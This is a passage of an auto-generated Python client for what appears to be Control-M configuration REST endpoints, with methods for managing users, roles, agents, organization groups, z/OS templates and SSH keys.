noqa: E501 """Delete user # noqa: E501 Delete user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_user(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. 
(required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_user_with_http_info(user, **kwargs) # noqa: E501 else: (data) = self.delete_user_with_http_info(user, **kwargs) # noqa: E501 return data def delete_user_with_http_info(self, user, **kwargs): # noqa: E501 """Delete user # noqa: E501 Delete user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_user_with_http_info(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `delete_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'DELETE', path_params, query_params, 
header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_zos_template(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete z/OS Template # noqa: E501 Delete z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_zos_template(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 else: (data) = self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501 return data def delete_zos_template_with_http_info(self, server, agent, template_name, **kwargs): # noqa: E501 """Delete z/OS Template # noqa: E501 Delete z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_zos_template_with_http_info(server, agent, template_name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'template_name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `delete_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'DELETE', path_params, query_params, 
header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def disable_agent(self, server, agent, **kwargs): # noqa: E501 """disable agent from the Server # noqa: E501 Disable an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.disable_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be disabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def disable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """disable agent from the Server # noqa: E501 Disable an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.disable_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be disabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method disable_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `disable_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `disable_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/disable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def enable_agent(self, server, agent, **kwargs): # noqa: E501 
"""enable agent from the Server # noqa: E501 Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.enable_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be enabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def enable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """enable agent from the Server # noqa: E501 Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.enable_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected too. (required) :param str agent: The Agent to be enabled. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method enable_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `enable_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `enable_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/enable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def export_role(self, role, **kwargs): # noqa: E501 """Export 
Authorization Role # noqa: E501 Export Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.export_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleDataFull If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.export_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.export_role_with_http_info(role, **kwargs) # noqa: E501 return data def export_role_with_http_info(self, role, **kwargs): # noqa: E501 """Export Authorization Role # noqa: E501 Export Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.export_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleDataFull If the method is called asynchronously, returns the request thread. 
""" all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method export_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `export_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}/export', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleDataFull', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def generate_mft_rsa_ssh_key(self, server, agent, ssh_key_properties, **kwargs): # noqa: E501 """Generate RSA SSH Key # noqa: E501 Generate RSA SSH Key pair for SFTP account authentication # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.generate_mft_rsa_ssh_key(server, agent, ssh_key_properties, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param SshKeyProperties ssh_key_properties: Ssh Key pair properites (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, **kwargs) # noqa: E501 else: (data) = self.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, **kwargs) # noqa: E501 return data def generate_mft_rsa_ssh_key_with_http_info(self, server, agent, ssh_key_properties, **kwargs): # noqa: E501 """Generate RSA SSH Key # noqa: E501 Generate RSA SSH Key pair for SFTP account authentication # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.generate_mft_rsa_ssh_key_with_http_info(server, agent, ssh_key_properties, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param SshKeyProperties ssh_key_properties: Ssh Key pair properites (required) :return: SuccessData If the method is called asynchronously, returns the request thread. 
""" all_params = ['server', 'agent', 'ssh_key_properties'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method generate_mft_rsa_ssh_key" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 # verify the required parameter 'ssh_key_properties' is set if self.api_client.client_side_validation and ('ssh_key_properties' not in params or params['ssh_key_properties'] is None): # noqa: E501 raise ValueError("Missing the required parameter `ssh_key_properties` when calling `generate_mft_rsa_ssh_key`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'ssh_key_properties' in params: body_params = params['ssh_key_properties'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/ssh/key', 'POST', path_params, 
query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_agent_parameters(self, server, agent, **kwargs): # noqa: E501 """get agent parameters # noqa: E501 Get all the parameters of the specified Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agent_parameters(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to query. (required) :param bool extended_data: True to return more agent parameters. HIDDEN :return: KeyValueListResult If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_agent_parameters_with_http_info(self, server, agent, **kwargs): # noqa: E501 """get agent parameters # noqa: E501 Get all the parameters of the specified Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_agent_parameters_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to query. 
(required) :param bool extended_data: True to return more agent parameters. HIDDEN :return: KeyValueListResult If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'extended_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_agent_parameters" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_agent_parameters`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_agent_parameters`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] if 'extended_data' in params: query_params.append(('extendedData', params['extended_data'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/params', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='KeyValueListResult', # noqa: E501 
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    # --- Generated endpoint wrappers -------------------------------------
    # Each public method below is a thin convenience wrapper that delegates
    # to its *_with_http_info twin; the twin validates arguments, builds the
    # request (path/query/header params) and issues it via api_client.call_api.

    def get_agents(self, server, **kwargs):  # noqa: E501
        """get Server agents  # noqa: E501

        Get all the agents of the specified Server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_agents(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
        :param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
        :return: AgentDetailsList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Callers of this convenience wrapper receive only the deserialized
        # body, not the (data, status, headers) tuple.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_agents_with_http_info(server, **kwargs)  # noqa: E501
        else:
            (data) = self.get_agents_with_http_info(server, **kwargs)  # noqa: E501
            return data

    def get_agents_with_http_info(self, server, **kwargs):  # noqa: E501
        """get Server agents  # noqa: E501

        Get all the agents of the specified Server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_agents_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
        :param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
        :return: AgentDetailsList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'agent']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Snapshot the named arguments, then fold in kwargs after checking
        # each key against this endpoint's whitelist.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_agents" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `get_agents`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501

        query_params = []
        if 'agent' in params:
            query_params.append(('agent', params['agent']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agents', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AgentDetailsList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_all_authorization_roles(self, **kwargs):  # noqa: E501
        """Get Authorization Roles  # noqa: E501

        Get Authorization Roles  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_authorization_roles(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str role: The Role name.
        :param str description: The Role description.
        :return: RoleHeaderList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_authorization_roles_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_authorization_roles_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_authorization_roles_with_http_info(self, **kwargs):  # noqa: E501
        """Get Authorization Roles  # noqa: E501

        Get Authorization Roles  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_authorization_roles_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str role: The Role name.
        :param str description: The Role description.
        :return: RoleHeaderList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['role', 'description']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_authorization_roles" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'role' in params:
            query_params.append(('role', params['role']))  # noqa: E501
        if 'description' in params:
            query_params.append(('description', params['description']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/authorization/roles', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='RoleHeaderList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_all_organization_groups(self, **kwargs):  # noqa: E501
        """Get All organization groups  # noqa: E501

        Get All organization groups  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_organization_groups(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str organizationgroup: The organization group name.
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_organization_groups_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_organization_groups_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_organization_groups_with_http_info(self, **kwargs):  # noqa: E501
        """Get All organization groups  # noqa: E501

        Get All organization groups  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_organization_groups_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str organizationgroup: The organization group name.
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['organizationgroup']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_organization_groups" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'organizationgroup' in params:
            query_params.append(('organizationgroup', params['organizationgroup']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/authorization/organizationgroups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_all_roles_associated_with_organization_group(self, organizationgroup, **kwargs):  # noqa: E501
        """Get Authorization Roles associated with an organization group  # noqa: E501

        Get Authorization Roles associated with an organization group  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_roles_associated_with_organization_group(organizationgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str organizationgroup: Name of organization group (required)
        :param str role: The Role name.
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs)  # noqa: E501
        else:
            (data) = self.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, **kwargs)  # noqa: E501
            return data

    def get_all_roles_associated_with_organization_group_with_http_info(self, organizationgroup, **kwargs):  # noqa: E501
        """Get Authorization Roles associated with an organization group  # noqa: E501

        Get Authorization Roles associated with an organization group  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_roles_associated_with_organization_group_with_http_info(organizationgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str organizationgroup: Name of organization group (required)
        :param str role: The Role name.
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['organizationgroup', 'role']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_roles_associated_with_organization_group" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'organizationgroup' is set
        if self.api_client.client_side_validation and ('organizationgroup' not in params or params['organizationgroup'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `organizationgroup` when calling `get_all_roles_associated_with_organization_group`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'organizationgroup' in params:
            path_params['organizationgroup'] = params['organizationgroup']  # noqa: E501

        query_params = []
        if 'role' in params:
            query_params.append(('role', params['role']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/authorization/organizationgroup/{organizationgroup}/roles', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_all_users(self, **kwargs):  # noqa: E501
        """Get users  # noqa: E501

        Get users  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_users(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: The user name.
        :param str full_name: The user full name.
        :param str description: The user description.
        :return: list[UserHeader]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_users_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_users_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_all_users_with_http_info(self, **kwargs):  # noqa: E501
        """Get users  # noqa: E501

        Get users  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_users_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: The user name.
        :param str full_name: The user full name.
